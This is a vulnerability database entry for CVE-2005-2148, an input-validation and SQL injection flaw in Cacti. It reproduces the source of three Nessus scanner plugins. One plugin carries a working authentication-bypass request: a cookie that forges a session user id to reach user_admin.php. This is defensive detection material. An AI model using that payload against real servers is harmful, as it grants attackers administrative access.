Vulnerabilities > CVE-2005-2148 - SQL Injection vulnerability in RaXnet Cacti Input Filter
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
PARTIAL Availability impact
PARTIAL Summary
Cacti 0.8.6e and earlier does not perform proper input validation to protect against common attacks, which allows remote attackers to execute arbitrary commands or SQL by sending a legitimate value in a POST request or cookie, then specifying the attack string in the URL, which causes the get_request_var function to return the wrong value in the $_REQUEST variable, which is cleansed while the original malicious $_GET value remains unmodified, as demonstrated in (1) graph_image.php and (2) graph.php.
Vulnerable Configurations
Nessus
NASL family CGI abuses NASL id CACTI_086F.NASL description The Cacti application running on the remote web server is affected by an authentication bypass vulnerability. last seen 2020-06-01 modified 2020-06-02 plugin id 18619 published 2005-07-05 reporter This script is Copyright (C) 2005-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/18619 title Cacti < 0.8.6f Authentication Bypass Vulnerability code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(18619); script_version("1.21"); script_cvs_date("Date: 2018/06/14 12:21:47"); script_cve_id("CVE-2005-2148", "CVE-2005-2149"); script_bugtraq_id(14027, 14130); script_name(english:"Cacti < 0.8.6f Authentication Bypass Vulnerability"); script_summary(english:"Attempts to exploit the vulnerability."); script_set_attribute(attribute:"synopsis", value: "The remote web server is running a PHP application that is affected by an authentication bypass vulnerability."); script_set_attribute(attribute:"description", value: "The Cacti application running on the remote web server is affected by an authentication bypass vulnerability."); # https://web.archive.org/web/20061130123447/http://www.hardened-php.net/index.30.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?a392bde5"); # https://web.archive.org/web/20061130122909/http://www.hardened-php.net/index.31.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?79df242f"); # https://web.archive.org/web/20060502023335/http://www.hardened-php.net/index.33.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8090490f"); script_set_attribute(attribute:"see_also", value:"http://www.cacti.net/release_notes_0_8_6f.php"); script_set_attribute(attribute:"solution", value:"Upgrade to Cacti 0.8.6f or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:ND"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2005/07/02"); script_set_attribute(attribute:"patch_publication_date", value:"2005/07/01"); script_set_attribute(attribute:"plugin_publication_date", value:"2005/07/05"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:cacti:cacti"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc."); script_dependencies("cacti_detect.nasl"); script_require_ports("Services/www", 80); script_require_keys("www/cacti"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("webapp_func.inc"); get_install_count(app_name:'cacti', exit_if_zero:TRUE); port = get_http_port(default:80, php:TRUE); install = get_install_from_kb(appname:'cacti', port:port, exit_on_fail:TRUE); disable_cookiejar(); dir = install['dir']; # Try to exploit the authentication bypass flaw. r = http_send_recv3(port: port, method: 'GET', item: strcat(dir, "/user_admin.php"), add_headers: make_array("Cookie", "_SESSION[sess_user_id]=1;no_http_headers=1;")); if (isnull(r)) exit(0); # There's a problem if we get a link for adding users. if ('href="user_admin.php?action=user_edit">Add' >< r[2]) { security_hole(port); exit(0); }NASL family CGI abuses NASL id CACTI_086F_VCHECK.NASL description According to its self-reported version number, the Cacti application running on the remote web server is prior to version 0.8.6f. It is, therefore, potentially affected by the following vulnerabilities : - Multiple vulnerabilities exist due to improper input validation in last seen 2020-06-01 modified 2020-06-02 plugin id 81602 published 2015-03-03 reporter This script is Copyright (C) 2015-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/81602 title Cacti < 0.8.6f Multiple Vulnerabilities code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(81602); script_version("1.5"); script_cvs_date("Date: 2018/06/14 12:21:47"); script_cve_id("CVE-2005-2148", "CVE-2005-2149"); script_bugtraq_id(14027, 14130); script_name(english:"Cacti < 0.8.6f Multiple Vulnerabilities"); script_summary(english:"Checks the version of Cacti."); script_set_attribute(attribute:"synopsis", value: "The remote web server is running a PHP application that is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "According to its self-reported version number, the Cacti application running on the remote web server is prior to version 0.8.6f. It is, therefore, potentially affected by the following vulnerabilities : - Multiple vulnerabilities exist due to improper input validation in 'graph_image.php' and 'graph.php'. (CVE-2005-2148) - A flaw exists in 'config.php' that allows remote attackers to set the 'no_http_headers' switch and then modify session information in order to gain the privileges necessary to perform SQL injection attacks. (CVE-2005-2149)"); # https://web.archive.org/web/20061130123447/http://www.hardened-php.net/index.30.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?a392bde5"); # https://web.archive.org/web/20061130122909/http://www.hardened-php.net/index.31.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?79df242f"); # https://web.archive.org/web/20060502023335/http://www.hardened-php.net/index.33.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8090490f"); script_set_attribute(attribute:"see_also", value:"http://www.cacti.net/release_notes_0_8_6f.php" ); script_set_attribute(attribute:"solution", value:"Upgrade to Cacti 0.8.6f or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:ND"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2005/07/02"); script_set_attribute(attribute:"patch_publication_date", value:"2005/07/01"); script_set_attribute(attribute:"plugin_publication_date", value:"2015/03/03"); script_set_attribute(attribute:"potential_vulnerability", value:"true"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:cacti:cacti"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc."); script_dependencies("cacti_detect.nasl"); script_require_ports("Services/www", 80); script_require_keys("installed_sw/cacti", "www/PHP", "Settings/ParanoidReport"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("install_func.inc"); if (report_paranoia < 2) audit(AUDIT_PARANOID); app = 'cacti'; get_install_count(app_name:app, exit_if_zero:TRUE); port = get_http_port(default:80, php:TRUE); install = get_single_install( app_name : app, port : port, exit_if_unknown_ver : TRUE ); install_url = build_url(qs:install['path'], port:port); version = install['version']; ver = split(version, sep:'.', keep:FALSE); if ( int(ver[0]) == 0 && ( int(ver[1]) < 8 || (int(ver[1]) == 8 && ver[2] =~ '^([0-5][a-z]?|6[a-e]?)$') ) ) { set_kb_item(name:'www/'+port+'/SQLInjection', value:TRUE); if (report_verbosity > 0) { report = '\n URL : ' + install_url + '\n Installed version : ' + version + '\n Fixed version : 0.8.6f' + '\n'; security_hole(port:port, extra:report); } else security_hole(port); exit(0); } audit(AUDIT_WEB_APP_NOT_AFFECTED, "Cacti", install_url, version);NASL family Debian Local Security Checks NASL id DEBIAN_DSA-764.NASL description Several vulnerabilities have been discovered in cacti, a round-robin database (RRD) tool that helps create graphs from database information. The Common Vulnerabilities and Exposures Project identifies the following problems : - CAN-2005-1524 Maciej Piotr Falkiewicz and an anonymous researcher discovered an input validation bug that allows an attacker to include arbitrary PHP code from remote sites which will allow the execution of arbitrary code on the server running cacti. - CAN-2005-1525 Due to missing input validation cacti allows a remote attacker to insert arbitrary SQL statements. - CAN-2005-1526 Maciej Piotr Falkiewicz discovered an input validation bug that allows an attacker to include arbitrary PHP code from remote sites which will allow the execution of arbitrary code on the server running cacti. - CAN-2005-2148 Stefan Esser discovered that the update for the above mentioned vulnerabilities does not perform proper input validation to protect against common attacks. - CAN-2005-2149 Stefan Esser discovered that the update for CAN-2005-1525 allows remote attackers to modify session information to gain privileges and disable the use of addslashes to protect against SQL injection. last seen 2020-06-01 modified 2020-06-02 plugin id 19258 published 2005-07-21 reporter This script is Copyright (C) 2005-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/19258 title Debian DSA-764-1 : cacti - several vulnerabilities code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Debian Security Advisory DSA-764. The text # itself is copyright (C) Software in the Public Interest, Inc. # include("compat.inc"); if (description) { script_id(19258); script_version("1.23"); script_cvs_date("Date: 2019/08/02 13:32:18"); script_cve_id("CVE-2005-1524", "CVE-2005-1525", "CVE-2005-1526", "CVE-2005-2148", "CVE-2005-2149"); script_xref(name:"DSA", value:"764"); script_name(english:"Debian DSA-764-1 : cacti - several vulnerabilities"); script_summary(english:"Checks dpkg output for the updated package"); script_set_attribute( attribute:"synopsis", value:"The remote Debian host is missing a security-related update." ); script_set_attribute( attribute:"description", value: "Several vulnerabilities have been discovered in cacti, a round-robin database (RRD) tool that helps create graphs from database information. The Common Vulnerabilities and Exposures Project identifies the following problems : - CAN-2005-1524 Maciej Piotr Falkiewicz and an anonymous researcher discovered an input validation bug that allows an attacker to include arbitrary PHP code from remote sites which will allow the execution of arbitrary code on the server running cacti. - CAN-2005-1525 Due to missing input validation cacti allows a remote attacker to insert arbitrary SQL statements. - CAN-2005-1526 Maciej Piotr Falkiewicz discovered an input validation bug that allows an attacker to include arbitrary PHP code from remote sites which will allow the execution of arbitrary code on the server running cacti. - CAN-2005-2148 Stefan Esser discovered that the update for the above mentioned vulnerabilities does not perform proper input validation to protect against common attacks. - CAN-2005-2149 Stefan Esser discovered that the update for CAN-2005-1525 allows remote attackers to modify session information to gain privileges and disable the use of addslashes to protect against SQL injection." ); script_set_attribute( attribute:"see_also", value:"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=316590" ); script_set_attribute( attribute:"see_also", value:"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=315703" ); script_set_attribute( attribute:"see_also", value:"http://www.debian.org/security/2005/dsa-764" ); script_set_attribute( attribute:"solution", value: "Upgrade the cacti package. For the old stable distribution (woody) these problems have been fixed in version 0.6.7-2.5. For the stable distribution (sarge) these problems have been fixed in version 0.8.6c-7sarge2." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:cacti"); script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.0"); script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.1"); script_set_attribute(attribute:"patch_publication_date", value:"2005/07/21"); script_set_attribute(attribute:"plugin_publication_date", value:"2005/07/21"); script_set_attribute(attribute:"vuln_publication_date", value:"2005/06/22"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc."); script_family(english:"Debian Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l"); exit(0); } include("audit.inc"); include("debian_package.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian"); if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (deb_check(release:"3.0", prefix:"cacti", reference:"0.6.7-2.5")) flag++; if (deb_check(release:"3.1", prefix:"cacti", reference:"0.8.6c-7sarge2")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get()); else security_hole(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");
References
- http://secunia.com/advisories/15490
- http://securitytracker.com/id?1014361
- http://sourceforge.net/mailarchive/forum.php?forum_id=10360&max_rows=25&style=flat&viewmonth=200507&viewday=1
- http://www.cacti.net/downloads/patches/0.8.6e/cacti-0.8.6f_security.patch
- http://www.debian.org/security/2005/dsa-764
- http://www.hardened-php.net/advisory-032005.php
- http://www.hardened-php.net/advisory-042005.php
- http://www.securityfocus.com/archive/1/404047/30/30/threaded
- http://www.securityfocus.com/archive/1/404054
- http://www.securityfocus.com/bid/14128
- http://www.securityfocus.com/bid/14129
- http://www.vupen.com/english/advisories/2005/0951
- https://exchange.xforce.ibmcloud.com/vulnerabilities/21266
- https://exchange.xforce.ibmcloud.com/vulnerabilities/21270